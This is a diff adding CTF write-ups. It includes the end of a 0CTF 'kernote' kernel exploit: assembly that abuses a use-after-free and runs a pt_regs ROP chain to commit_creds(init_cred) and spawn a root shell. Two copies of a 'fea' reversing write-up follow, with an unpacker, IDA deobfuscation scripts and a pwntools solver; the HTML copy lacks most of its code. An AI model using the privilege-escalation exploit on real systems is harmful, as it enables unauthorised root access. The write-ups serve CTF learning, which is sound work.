+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6668
+ jmp ioctl
+
+write_note:
+ mov rdx, rdi
+ mov edi, [kfd]
+ mov esi, 0x6669
+ jmp ioctl
+
+pwn:
+ mov [user_rsp], rsp
+ ; 0xffffffff81075c4c: pop rdi; ret
+ mov r15, 0xffffffff81075c4c
+ ; 0xffffffff8266b780: init_cred
+ mov r14, 0xffffffff8266b780
+ ; 0xffffffff810c9dd5: commit_creds
+ mov r13, 0xffffffff810c9dd5
+ ; 0xffffffff810761da: pop rcx; ret
+ mov r12, 0xffffffff810761da
+ lea rbp, [.after_syscall]
+ ; 0xffffffff8107605a: pop r11; ret
+ mov rbx, 0xffffffff8107605a
+ ; 0xffffffff81c00109: return from syscall
+ mov r10, 0xffffffff81c00109
+ xor eax, eax
+ syscall
+.after_syscall:
+ mov rsp, [user_rsp]
+ ret
+
+_start:
+ ; kfd = open("/dev/kernote", O_RDWR)
+ lea rdi, [devpath]
+ mov esi, O_RDWR
+ call open
+ mov [kfd], eax
+
+ ; for (int i = 0; i < 0x100; i++) {
+ ; alloc_entry(0);
+ ; }
+ mov r8d, 0x100
+.sprayloop:
+ xor edi, edi
+ call alloc_entry
+ dec r8d
+ jnz .sprayloop
+
+ ; alloc_entry(1)
+ mov edi, 1
+ call alloc_entry
+ ; set_note(1)
+ mov edi, 1
+ call set_note
+ ; free_entry(1)
+ mov edi, 1
+ call free_entry
+
+ ; statfd = open("/proc/self/stat", O_RDONLY)
+ lea rdi, [statpath]
+ mov esi, O_RDONLY
+ call open
+ mov [statfd], eax
+
+ ; 0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+ ; write_note(0xffffffff81516ebe)
+ mov rdi, 0xffffffff81516ebe
+ call write_note
+
+ ; pwn(statfd, buf, sizeof(buf))
+ mov edi, [statfd]
+ lea rsi, [buf]
+ mov edx, bufsize
+ call pwn
+
+ ; execve("/bin/sh", {"/bin/sh", NULL}, NULL)
+ lea rdi, [shell_path]
+ lea rsi, [shell_argv]
+ xor edx, edx
+ jmp execve
+
+user_rsp: dq 0
+kfd: dd 0
+statfd: dd 0
+shell_argv: dq shell_path, 0
+buf: times 32 db 0
+bufsize equ $ - buf
+
+devpath: db '/dev/kernote', 0
+statpath: db '/proc/self/stat', 0
+shell_path: db '/bin/sh', 0
+
+filesize equ $ - $$
+```
+
+```
+flag{LMm2tayzwWEzGpnmoyyf8zoTmk6X5TQrL45o}
+```
+
+## Intended solution
+
+It is pretty clear that this solution is not what the author intended, but
+it was still fun and it got us a flag which is what counts. The intended
+solution was to overwrite a freed `ldt_struct`. You can find the author's own
+writeup [here](https://github.com/YZloser/My-CTF-Challenges/tree/master/0ctf-2021-final/kernote).
+
+## Conclusion
+
+Thanks to busdma for the help with reversing and the initial PoC exploit and to
+my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for
+the amazing CTF, we really had a lot of fun playing this one. Looking forward
+to next year's edition :).
+
+I don't know if using `pt_regs` as ROP chain is a new technique or not. I've
+never heard of it before and I couldn't find anything on Google. It seems pretty
+powerful though: it only requires RIP control and bypasses all mitigations
+except KASLR, assuming that the kernel has the right gadgets. Let me know if
+it's been used before somewhere.
\ No newline at end of file
diff --git a/0CTF-2021-finals/pwn/kernote1.png b/0CTF-2021-finals/pwn/kernote1.png
new file mode 100755
index 0000000..fe70a72
Binary files /dev/null and b/0CTF-2021-finals/pwn/kernote1.png differ
diff --git a/0CTF-2021/index.html b/0CTF-2021/index.html
new file mode 100755
index 0000000..4eda8c0
--- /dev/null
+++ b/0CTF-2021/index.html
@@ -0,0 +1,216 @@
+
+
+
+
+
+0CTF/TCTF 2021 Quals | Organisers
+
Only a netcat connection as description for a rev challenge, off to a good start I see. After connecting and solving the POW1, we receive the following:
+
+
[1/3]
+Here is your challenge:
+
+f0VMRgIBAQAAAAAAAAAAAAIAPgAB...
+
+Plz beat me in 10 seconds X3 :)
+
+
+
So it seems that this is a twist on the old automatic exploitation challenge :).
+I wrote a quick script to collect as many samples as possible, thinking that maybe they were just cycling a few different binaries:
I also noticed that the strings must be encrypted, because one of the functions was doing a sprintf without any format specifiers in a weird looking string:
Turns out the strings were not so useful after all, they are just used for anti debugging. Basically, the binary checks whether the command line is one of gdb, strace, ltrace or linux_server64, and if yes, enters infinite recursion.
+
+
However, I also found another interesting looking init function:
It seems to install a SIGALRM handler and also mmaps 0xDEAD0000. The SIGALRM handler basically just sets a variable so that main can advance. While this looked a lot nicer, it was still clearly obfuscated. I remembered reading about similar obfuscation and there being an IDA plugin that can help with that.
+
+
I found the plugin again and it proved to be quite useful: https://eshard.com/posts/d810_blog_post_1/
+
+
With the plugin installed and configured correctly (make sure to turn off the rules about global variables), functions suddenly looked perfectly fine again:
At first, I thought this was just another anti-debugging technique, but as it turned out later, this is actually used by the binary.
+Next, we see that it just waits for the first alarm, then unpacks a buffer and executes it (at an offset). My teammate started working on an unpacker. He said “the source code is self documenting”, so here you go ;):
+
+
#!/usr/bin/env python3
+
+
+def unpack(binary):
+    packed_full = binary[0x60d0:]  # TODO: find real size
+    unpacked = bytearray()
+
+    # the packed data is always consumed linearly, so just "eat" prefixes to avoid annoying index calc
+    packed = packed_full
+
+    def eat(n):
+        nonlocal packed
+        val = packed[:n]
+        packed = packed[n:]
+        return val
+
+    def eat_byte():
+        return eat(1)[0]
+
+    firsthigh = packed[0] >> 5
+    assert firsthigh == 0 or firsthigh == 1
+    big_chungus = (firsthigh == 1)
+    assert big_chungus  # could remove this assert, but it seems like every chal is actually big chungus
+
+    # remove high bits from very first byte to treat it like a regular memcpy
+    packed = bytes([packed[0] & 0x1f]) + packed[1:]
+
+    def eat_size():
+        # yeah, this is shitty code
+        if big_chungus:
+            eaten = eat_byte()
+            result = eaten
+            while eaten == 0xff:
+                # print("BIG CHUNGUS SIZE")
+                eaten = eat_byte()
+                result += eaten
+            return result
+        else:
+            return eat_byte()
+
+
+    # this ends up reading more than the size of the original packed buffer, which means it produces garbage at the end.
+    # we probably don't care, but TODO: possibly fix this
+    while len(packed):
+        firstbyte = eat_byte()
+        high, low = firstbyte >> 5, firstbyte & 0x1f
+        # print(high, low)
+        if high == 0:
+            # simple memcpy
+            size = low + 1
+            unpacked += eat(size)
+        else:
+            if high == 7:  # all bits set
+                size = (high - 1) + eat_size() + 3
+            else:
+                size = (high - 1) + 3
+            least_sig_offset = eat_byte()
+            rel_offset = -(least_sig_offset + 1 + 0x100*low)
+            # print("size ", size)
+            if big_chungus and least_sig_offset == 0xff and low == 0x1f:
+                # print("BIG CHUNGUS OFFSET")
+                most_sig = eat_byte()
+                least_sig = eat_byte()
+                rel_offset = -(0x2000 + (most_sig << 8) + least_sig)
+
+            # print("rel offset ", rel_offset, "; size", size, "; copied", len(unpacked))
+            assert -rel_offset <= len(unpacked)
+            offset = rel_offset + len(unpacked)
+            # existing = unpacked[offset:offset+size]
+            # unpacked += existing.ljust(size, b"\x00")
+            # weird memmove aliasing behavior means we need to copy byte by byte
+            for i in range(size):
+                unpacked += bytes([unpacked[offset + i]])
+    return unpacked
+
+if __name__ == "__main__":
+    filename = "chals/chal_16"
+    binary = open(filename, 'rb').read()
+    unpacked = unpack(binary)
+    open(filename + "__unpacked", "wb").write(unpacked)
+
+
+
+
+
In case the source code isn’t quite as self-documenting as he claimed:
+
+
+
In every binary, the packed data always starts at a constant offset 0x60d0. This makes it easy to extract. While the length varies by some amount (and could be extracted from the binary), it turned out to be sufficient to simply decode as much as we can and ignore the excess.
+
We’re not sure if the format of the packed data is well-known somehow (or a variant of something well-known), but it’s fairly simple either way.
+
The packed data consists of a sequence of what we will call chunks. The 3 most significant bits of the first byte of a chunk determine its type:
+
+
If they’re 0, this is a simple “constant” chunk. The size is determined by least significant 5 bits plus 1, i.e. (firstbyte & 0x1f) + 1 bytes of data follow, which are copied into the output.
+
If they’re non-zero, the chunk references a certain amount of bytes from the output that was already written, relative to the end of the output buffer. Both the size and the relative offset are encoded in a variable-length scheme.
+
+
The contents of the output buffer are memmoved instead of memcpy‘d. Special care has to be taken for cases where the source and destination memory ranges overlap, which can and does happen.
+
+
+
+
+
The very first chunk is always treated as constant data. Its 3 most significant bits instead set what we call the big_chungus flag (True if they are equal to 1, False if 0, error if they’re set to anything else). This flag appears to enable some additional variable-length encoding of sizes and offsets, and always seems to be set to true in the binaries we were given. The unpacking function in the binary, sub_404740, in fact calls one of two different functions: the big-chungus-enabled sub_403E50 or the apparently unused sub_402760.
+
+
+
I patched out the anti debugging checks and signal handlers and started debugging.
+I dumped the unpacked code into a binary file and loaded it into IDA once again.
+I also continued debugging the unpacked code. It was really annoying to debug and statically analyze, since most functions have the following snippet interspersed every few instructions:
Basically, this skips over the byte after the second call and hence IDA cannot really reconstruct the control flow / figure out where instructions are. However, this is nothing a little IDA scripting can’t fix ;):
Basically, this goes through the instructions and if it sees a call to such a function, it patches it with a jmp to the next byte. Armed with this and debugging some more, it becomes apparent what the function does (manual decompilation):
Unfortunately, for the longest time, I thought that sub_0 was getting called with our input and not zeroes (more on that later). In any case, I tried running angr on it, but it seemed to not really work. One issue was that sub_0 actually has a lot of int 3 instructions. I tried doing the following to implement the sighandler from the binary, but I still didn’t get an answer [2]:
So I started reversing sub_0 manually (still thinking it depended on our input and hence we would need to know what it does). Unfortunately, even with the patched binary, IDA still didn’t want to include all of the code in the function, so some more scripting later, I was finally able to hit decompile on the whole thing:
Before being able to hit F5 and see something, I had to increase the max function size in IDA (this was already very promising), but I finally got to see it in all its glory:
Obviously, this was not going to be possible to reverse by hand. However, it seemed to be just constant operations. Just for the fun of it, I added two rules to the aforementioned deobfuscation plugin:
+
+
+
replace nullsubs with nops
+
replace __debugbreak with *0xDEAD0000 ^= 0xDEADBEEF
+
+
+
I did this by adding the following to chain_rules.py:
And then I realized, oh our input is constant and hence this just sets our input to the constants seen above. My teammate wrote a quick binary, that mmaps the unpacked shellcode, runs the sub_0 function and prints the resulting values:
The final piece of the puzzle was the function sub_223F3, which actually does something with our input. Fortunately, it seems it was exactly the same for every binary. I translated it into z3 and was able to solve for our input (after wasting some time debugging why it wasn’t working, because I mistyped v1 as v4):
With all of that done, we can now write our exploit script and get the flag :):
+
+
#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 111.186.58.164 --port 30212
+from pwn import *
+from hashlib import sha256
+from itertools import product
+import re
+import string
+from pwnlib.tubes.tube import tube
+# import pow
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe = './path/to/binary'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host = args.HOST or '111.186.58.164'
+port = int(args.PORT or 30212)
+
+def local(argv=[], *a, **kw):
+    '''Execute the target binary locally'''
+    if args.GDB:
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe] + argv, *a, **kw)
+
+def remote(argv=[], *a, **kw):
+    '''Connect to the process on the remote host'''
+    io = connect(host, port)
+    if args.GDB:
+        gdb.attach(io, gdbscript=gdbscript)
+    return io
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.LOCAL:
+        return local(argv, *a, **kw)
+    else:
+        return remote(argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+def solve_proof_of_work(hashable_suffix, hash):
+    # brute-force the 4-character prefix "XXXX" of sha256(XXXX + suffix)
+    alphabet = (string.ascii_letters + string.digits + '!#$%&*-?')
+    for hashable_prefix in product(alphabet, repeat=4):
+        current_hash_in_hex = sha256((''.join(hashable_prefix) + hashable_suffix).encode()).hexdigest()
+        if current_hash_in_hex == hash:
+            return ''.join(hashable_prefix)
+
+
+io = start()
+
+proof_of_work_line = io.recvline(keepends=False).decode("utf-8")
+io.recvline()
+hashable_suffix = re.search(r'sha256\(XXXX\+(.*)\) ==', proof_of_work_line).group(1)
+hash = re.search(r'== (.*)', proof_of_work_line).group(1)
+log.info("Solving POW %s for %s", hashable_suffix, hash)
+proof = solve_proof_of_work(hashable_suffix, hash)
+io.sendline(proof)
+io: tube
+
+import base64
+
+def read_challenge():
+    io.readuntil("Here is your challenge:")
+    # swallow 2 newlines
+    io.recvline()
+    io.recvline()
+    challenge = io.recvline()
+    return base64.b64decode(challenge)
+
+for i in range(3):
+
+    log.info("Downloading challenge %d", i)
+    chal1 = read_challenge()
+    with open(f"chal{i}", "wb") as f:
+        f.write(chal1)
+
+    import unpack
+    log.info("Unpacking challenge")
+    unpacked = unpack.unpack(chal1)
+
+    with open(f"chal{i}_unpacked", "wb") as f:
+        f.write(unpacked)
+
+    log.info("Running wrapper")
+    p = process(["./wrapper", f"chal{i}_unpacked"])
+    res1 = p.readuntil(" ")
+    res1 = int(res1, 16)
+    res2 = p.readuntil("\n")
+    res2 = int(res2, 16)
+
+    log.info("Targets: 0x%x, 0x%x", res1, res2)
+
+    import do_solve
+    sender = do_solve.do_solve(res1, res2)
+
+    io.send(sender)
+
+io.interactive()
+
+
+
+
+
+
[1] For some reason I tried making a fast GPU-based POW solver; it turned out to be slower than plain Python hashlib :face_palm:
+
+
+
[2] This was probably for other reasons; angr did manage to work later on.
diff --git a/0CTF-2021/rev/fea.md b/0CTF-2021/rev/fea.md
new file mode 100755
index 0000000..78acf43
--- /dev/null
+++ b/0CTF-2021/rev/fea.md
@@ -0,0 +1,936 @@
+# fea
+
+**Authors:** gallileo, null
+**Tags:** rev, obfuscation
+**Points:** 458
+**Description:**
+> nc 111.186.58.164 30212
+
+Only a netcat connection as description for a rev challenge, off to a good start I see. After connecting and solving the POW[^1], we receive the following:
+
+```
+[1/3]
+Here is your challenge:
+
+f0VMRgIBAQAAAAAAAAAAAAIAPgAB...
+
+Plz beat me in 10 seconds X3 :)
+```
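
The blob is base64, and its visible prefix already tells us what we are dealing with. As a small sanity check (a sketch, using only the truncated prefix shown above; the helper name `describe_elf_prefix` is made up for illustration), we can decode it and look at the first ELF header fields:

```python
import base64
import struct

# Prefix of the base64 blob shown in the server output (the rest is elided there).
SAMPLE_PREFIX = "f0VMRgIBAQAAAAAAAAAAAAIAPgAB"


def describe_elf_prefix(b64_prefix: str) -> dict:
    """Decode a base64 prefix and extract a few fields of the ELF header."""
    raw = base64.b64decode(b64_prefix)
    # e_ident is 16 bytes; e_type and e_machine (2 bytes each) follow directly.
    e_type, e_machine = struct.unpack_from("<HH", raw, 16)
    return {
        "magic": raw[:4],
        "ei_class": raw[4],   # 1 = 32-bit, 2 = 64-bit
        "ei_data": raw[5],    # 1 = little endian
        "e_type": e_type,     # 2 = ET_EXEC
        "e_machine": e_machine,  # 0x3E = x86-64
    }


info = describe_elf_prefix(SAMPLE_PREFIX)
print(info)
```

So each challenge is a 64-bit x86-64 ELF executable that we have to analyze within the time limit.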
+
+So it seems that this is a twist on the old automatic exploitation challenge :).
+I wrote a quick script to collect as many samples as possible, thinking that maybe they were just cycling a few different binaries:
+
+```python
+import hashlib
+import os
+import re
+from typing import Dict
+
+# `start`, `log`, `tube` and `solve_proof_of_work` come from the pwntools exploit template
+
+class chal_info:
+    def __init__(self, idx, md5):
+        self.md5 = md5
+        self.occurrences = 1
+        self.idx = idx
+
+    def did_see(self):
+        self.occurrences += 1
+
+    @property
+    def filename(self):
+        return os.path.join("samples", f"chal_{self.idx}")
+
+idx = 0
+chals: Dict[str, chal_info] = {}
+while True:
+    try:
+        io = start()
+
+        proof_of_work_line = io.recvline(keepends=False).decode("utf-8")
+        io.recvline()
+        hashable_suffix = re.search(r'sha256\(XXXX\+(.*)\) ==', proof_of_work_line).group(1)
+        hash = re.search(r'== (.*)', proof_of_work_line).group(1)
+        log.info("Solving POW %s for %s", hashable_suffix, hash)
+        proof = solve_proof_of_work(hashable_suffix, hash)
+        io.sendline(proof)
+        io: tube
+
+        import base64
+
+        def read_challenge():
+            io.readuntil("Here is your challenge:")
+            # swallow 2 newlines
+            io.recvline()
+            io.recvline()
+            challenge = io.recvline()
+            return base64.b64decode(challenge)
+
+        chal = read_challenge()
+
+        chal_md5 = hashlib.md5(chal).hexdigest()
+        if chal_md5 in chals:
+            # already seen this binary: just bump its counter
+            chals[chal_md5].did_see()
+        else:
+            info = chal_info(idx, chal_md5)
+            idx += 1
+            chals[chal_md5] = info
+            with open(info.filename, "wb") as f:
+                f.write(chal)
+
+        log.info("Statistics:")
+        for key, chal in chals.items():
+            print(f"\t{chal.filename}: #{chal.occurrences} ({chal.md5})")
+
+
+        io.close()
+    except Exception:
+        # keep collecting on network/parse errors, but still allow Ctrl-C
+        log.warning("Had an error")
+```
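
The collector relies on `solve_proof_of_work` from our exploit template. Judging by the regex above, the server asks for four characters `XXXX` such that `sha256(XXXX + suffix)` equals a given digest. A minimal standalone sketch of such a solver follows; the alphabet is the one used in our final exploit, while the `alphabet` and `length` parameters and the demo values are only there so the example can be checked quickly:

```python
import hashlib
import string
from itertools import product

# Alphabet taken from the exploit script; the real server may use a different one.
ALPHABET = string.ascii_letters + string.digits + "!#$%&*-?"


def solve_pow(suffix: str, target_hex: str, alphabet: str = ALPHABET, length: int = 4):
    """Brute-force a prefix such that sha256(prefix + suffix) == target_hex."""
    for candidate in product(alphabet, repeat=length):
        prefix = "".join(candidate)
        digest = hashlib.sha256((prefix + suffix).encode()).hexdigest()
        if digest == target_hex:
            return prefix
    return None  # no prefix of this length over this alphabet matches


# Self-check with a made-up suffix and a tiny alphabet so it finishes instantly.
demo_suffix = "demoSuffix"
demo_target = hashlib.sha256(("abca" + demo_suffix).encode()).hexdigest()
demo_solution = solve_pow(demo_suffix, demo_target, alphabet="abc")
print(demo_solution)
```

With the full alphabet there are 70^4 (about 24 million) candidates, which plain `hashlib` gets through quickly enough for this challenge.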
+
+I started analyzing one of the binaries in my favourite disassembler. `main` looked pretty bad and the other functions didn't look pretty either:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ int v3; // esi
+ int v4; // ecx
+ int v5; // eax
+ int v6; // ecx
+ int v7; // ecx
+ int i; // [rsp+4Ch] [rbp-34h]
+ int v10; // [rsp+5Ch] [rbp-24h]
+ char *s; // [rsp+60h] [rbp-20h]
+
+ sub_400D90(a1, a2, a3);
+ s = (char *)mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ for ( i = 911436592; ; i = v4 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ if ( i == -1611068981 )
+ {
+ perror(aPu);
+ exit(-1);
+ }
+ if ( i != -1554549674 )
+ break;
+ i = 1518786008;
+ usleep(0x186A0u);
+ }
+ if ( i != -1535510725 )
+ break;
+ v10 = sub_404740(&unk_6060D0, 73569LL, s, 0xFFFFFFLL);
+ v7 = -1085199925;
+ if ( !v10 )
+ v7 = -1611068981;
+ i = v7;
+ }
+ if ( i == -1297152665 )
+ {
+ perror(a1P);
+ exit(-1);
+ }
+ if ( i != -1085199925 )
+ break;
+ sub_400EC0();
+ i = 1628391944;
+ ((void (*)(void))&s[dword_6060C0])();
+ }
+ if ( i != -122192319 )
+ break;
+ sub_400EC0();
+ i = 1518786008;
+ }
+ if ( i != 610093714 )
+ break;
+ v5 = sub_4014E0();
+ v6 = -1554549674;
+ if ( v5 != dword_6180D0 )
+ v6 = 620693745;
+ i = v6;
+ }
+ if ( i != 620693745 )
+ break;
+ ((void (*)(void))loc_400AC0)();
+ i = -1554549674;
+ }
+ if ( i != 911436592 )
+ break;
+ v3 = -122192319;
+ if ( s == (char *)-1LL )
+ v3 = -1297152665;
+ i = v3;
+ }
+ if ( i != 1518786008 )
+ break;
+ v4 = -1535510725;
+ if ( !dword_6180CC )
+ v4 = 610093714;
+ }
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+I also noticed that the strings must be encrypted, because one of the functions was calling `snprintf` with a weird-looking format string that contains no format specifiers:
+
+```c
+snprintf(s, 0x400uLL, &byte_618040, v8);
+char byte_618040[16] =
+{
+ '\xE6', '\xB9', '\xBB', '\xA6', '\xAA', '\xE6', '\xEC', '\xAD', '\xE6', '\xAA', '\xA4', '\xAD', '\xA5', '\xA0', '\xA7', '\xAC'
+};
+
+```
+
+One xref later, we found an init function that decrypts the string. Some IDA scripting later, and we can decrypt the strings in the binary:
+
+```python
+import idaapi
+import ida_segment
+import logging
+log = logging.getLogger("decrypt_strings")
+
+def do_init_array():
+    seg: idaapi.segment_t = ida_segment.get_segm_by_name(".init_array")
+    log.info("Found init_array: 0x%x - 0x%x", seg.start_ea, seg.end_ea)
+    funcs = []
+    ea = seg.start_ea
+    idx = 1
+    while ea != idaapi.BADADDR and ea < seg.end_ea:
+        func_addr = idaapi.get_qword(ea)
+        funcs.append(func_addr)
+        idaapi.set_name(func_addr, f"init{idx}")
+        ea += 8
+        idx += 1
+    return funcs
+
+init_funcs = do_init_array()
+
+dec_loop_size = 0x43
+dec_addr_off = 0x12
+dec_key_off = 0x18
+dec_size_off = 0x26
+import idc
+
+def decrypt_string(loop_start):
+    log.info("Decrypting string@0x%x", loop_start)
+    mov_insn = idaapi.insn_t()
+    xor_insn = idaapi.insn_t()
+    sub_insn = idaapi.insn_t()
+    idaapi.decode_insn(mov_insn, loop_start+dec_addr_off)
+    idaapi.decode_insn(xor_insn, loop_start+dec_key_off)
+    idaapi.decode_insn(sub_insn, loop_start+dec_size_off)
+    addr = mov_insn.Op2.addr
+    key = xor_insn.Op2.value
+    size = sub_insn.Op2.value
+    log.info("Decrypting string @ 0x%x of size 0x%x", addr, size)
+    dec_str = ""
+    for i in range(size+1):
+        car = idaapi.get_byte(addr + i)
+        dec_car = (car ^ key) & 0xff
+        dec_str += chr(dec_car)
+        idaapi.patch_byte(addr + i, dec_car)
+
+    idaapi.create_strlit(addr, 0, 0)
+
+    log.info("Decrypted string: %s", dec_str)
+
+def decrypt_strings():
+    decrypt_string_func = init_funcs[0]
+    log.info("Decrypt strings@0x%x", decrypt_string_func)
+    curr = decrypt_string_func
+    for i in range(8):
+        decrypt_string(curr)
+        curr += dec_loop_size
+
+decrypt_strings()
+```
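
The same decryption can be reproduced outside of IDA on the 16 bytes of `byte_618040` shown earlier. The sketch below assumes a single-byte XOR key (which is what the IDA script applies) and simply tries all 256 keys, keeping those that give printable output. The key itself is not stated anywhere above; trying it out, `0xC9` is the one that yields the readable `/proc/%d/cmdline`, which fits the command line check described next:

```python
# Encrypted bytes of byte_618040, copied from the decompilation above.
ENCRYPTED = bytes([
    0xE6, 0xB9, 0xBB, 0xA6, 0xAA, 0xE6, 0xEC, 0xAD,
    0xE6, 0xAA, 0xA4, 0xAD, 0xA5, 0xA0, 0xA7, 0xAC,
])


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def printable_candidates(data: bytes) -> dict:
    """Return {key: plaintext} for every key that decodes to printable ASCII."""
    result = {}
    for key in range(256):
        plain = xor_bytes(data, key)
        if all(0x20 <= c < 0x7F for c in plain):
            result[key] = plain
    return result


candidates = printable_candidates(ENCRYPTED)
for key, plain in candidates.items():
    # Several keys give printable garbage; a path-like string stands out.
    if plain.startswith(b"/"):
        print(hex(key), plain)
```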
+
+Turns out the strings were not so useful after all, they are just used for anti debugging. Basically, the binary checks whether the command line is one of `gdb`, `strace`, `ltrace` or `linux_server64`, and if yes, enters infinite recursion.
+
+However, I also found another interesting looking init function:
+
+```c
+__int64 init4()
+{
+ __int64 result; // rax
+ int v1; // esi
+ unsigned int i; // [rsp+2Ch] [rbp-14h]
+ void *s; // [rsp+30h] [rbp-10h]
+
+ signal(14, sub_400AF0);
+ alarm(1u);
+ dword_6180D0 = sub_4014E0();
+ s = mmap((void *)0xDEAD0000LL, 0x1000uLL, 3, 34, -1, 0LL);
+ memset(s, 0, 0x1000uLL);
+ for ( i = 691787201; ; i = v1 )
+ {
+ result = i;
+ if ( i == -794482235 )
+ break;
+ if ( i == 397321255 )
+ {
+ perror(a1P);
+ exit(-1);
+ }
+ v1 = -794482235;
+ if ( s == (void *)-1LL )
+ v1 = 397321255;
+ }
+ return result;
+}
+
+```
+It seems to install a SIGALRM handler and also mmaps `0xDEAD0000`. The SIGALRM handler basically just sets a variable so that main can advance. While this looked a lot nicer, it was still clearly obfuscated. I remembered reading about similar obfuscation and there being an IDA plugin that can help with that.
+
+I found the plugin again and it proved to be quite useful: https://eshard.com/posts/d810_blog_post_1/
+
+With the plugin installed and configured correctly (make sure to turn off the rules about global variables), functions suddenly looked perfectly fine again:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ char *s; // [rsp+60h] [rbp-20h]
+
+ sub_400D90();
+ s = (char *)mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ sub_400EC0();
+ while ( !dword_6180CC )
+ {
+ if ( (unsigned int)sub_4014E0() != dword_6180D0 )
+ ((void (*)(void))loc_400AC0)();
+ usleep(0x186A0u);
+ }
+ sub_404740(&unk_6060D0, 73569LL, s, 0xFFFFFFLL);
+ sub_400EC0();
+ ((void (*)(void))&s[dword_6060C0])();
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+After some basic analysis using our newly found powers, we can see that main is very simple:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ void (__fastcall **s)(__int64); // [rsp+60h] [rbp-20h]
+
+ setup();
+ s = (void (__fastcall **)(__int64))mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ check_for_debugger();
+ while ( !did_alarm )
+ {
+ if ( (unsigned int)count_breakpoints() != init_num_bps )
+ ((void (*)(void))probably_crash)();
+ usleep(0x186A0u);
+ }
+ unpack(some_buf, 72638, (char *)s, 0xFFFFFF);
+ check_for_debugger();
+ ((void (*)(void))((char *)s + entry_off))();
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+`setup` sets up buffering, gets pid and checks the command line. It also installs the following interesting SIGTRAP handler:
+
+```c
+void handler()
+{
+ MEMORY[0xDEAD0000] ^= 0xDEADBEEF;
+}
+```
+
+At first, I thought this was just another anti-debugging technique, but as it turned out later, this is actually used by the binary.
+Next, we see that it just waits for the first alarm, then unpacks a buffer and executes it (at an offset). My teammate started working on an unpacker. He said "the source code is self documenting", so here you go ;):
+
+```python
+#!/usr/bin/env python3
+
+
+def unpack(binary):
+    packed_full = binary[0x60d0:]  # TODO: find real size
+    unpacked = bytearray()
+
+    # the packed data is always consumed linearly, so just "eat" prefixes to avoid annoying index calc
+    packed = packed_full
+
+    def eat(n):
+        nonlocal packed
+        val = packed[:n]
+        packed = packed[n:]
+        return val
+
+    def eat_byte():
+        return eat(1)[0]
+
+    firsthigh = packed[0] >> 5
+    assert firsthigh == 0 or firsthigh == 1
+    big_chungus = (firsthigh == 1)
+    assert big_chungus  # could remove this assert, but it seems like every chal is actually big chungus
+
+    # remove high bits from very first byte to treat it like a regular memcpy
+    packed = bytes([packed[0] & 0x1f]) + packed[1:]
+
+    def eat_size():
+        # yeah, this is shitty code
+        if big_chungus:
+            eaten = eat_byte()
+            result = eaten
+            while eaten == 0xff:
+                # print("BIG CHUNGUS SIZE")
+                eaten = eat_byte()
+                result += eaten
+            return result
+        else:
+            return eat_byte()
+
+
+    # this ends up reading more than the size of the original packed buffer, which means it produces garbage at the end.
+    # we probably don't care, but TODO: possibly fix this
+    while len(packed):
+        firstbyte = eat_byte()
+        high, low = firstbyte >> 5, firstbyte & 0x1f
+        # print(high, low)
+        if high == 0:
+            # simple memcpy
+            size = low + 1
+            unpacked += eat(size)
+        else:
+            if high == 7:  # all bits set
+                size = (high - 1) + eat_size() + 3
+            else:
+                size = (high - 1) + 3
+            least_sig_offset = eat_byte()
+            rel_offset = -(least_sig_offset + 1 + 0x100*low)
+            # print("size ", size)
+            if big_chungus and least_sig_offset == 0xff and low == 0x1f:
+                # print("BIG CHUNGUS OFFSET")
+                most_sig = eat_byte()
+                least_sig = eat_byte()
+                rel_offset = -(0x2000 + (most_sig << 8) + least_sig)
+
+            # print("rel offset ", rel_offset, "; size", size, "; copied", len(unpacked))
+            assert -rel_offset <= len(unpacked)
+            offset = rel_offset + len(unpacked)
+            # existing = unpacked[offset:offset+size]
+            # unpacked += existing.ljust(size, b"\x00")
+            # weird memmove aliasing behavior means we need to copy byte by byte
+            for i in range(size):
+                unpacked += bytes([unpacked[offset + i]])
+    return unpacked
+
+if __name__ == "__main__":
+    filename = "chals/chal_16"
+    binary = open(filename, 'rb').read()
+    unpacked = unpack(binary)
+    open(filename + "__unpacked", "wb").write(unpacked)
+
+
+```
+
+In case the source code isn't quite as self-documenting as he claimed:
+
+- In every binary, the packed data always starts at a constant offset `0x60d0`. This makes it easy to extract. While the length varies by some amount (and could be extracted from the binary), it turned out to be sufficient to simply decode as much as we can and ignore the excess.
+- We're not sure if the format of the packed data is well-known somehow (or a variant of something well-known), but it's fairly simple either way.
+- The packed data consists of a sequence of what we will call *chunks*. The 3 most significant bits of the first byte of a chunk determine its type:
+ - If they're 0, this is a simple "constant" chunk. The size is determined by least significant 5 bits plus 1, i.e. `(firstbyte & 0x1f) + 1` bytes of data follow, which are copied into the output.
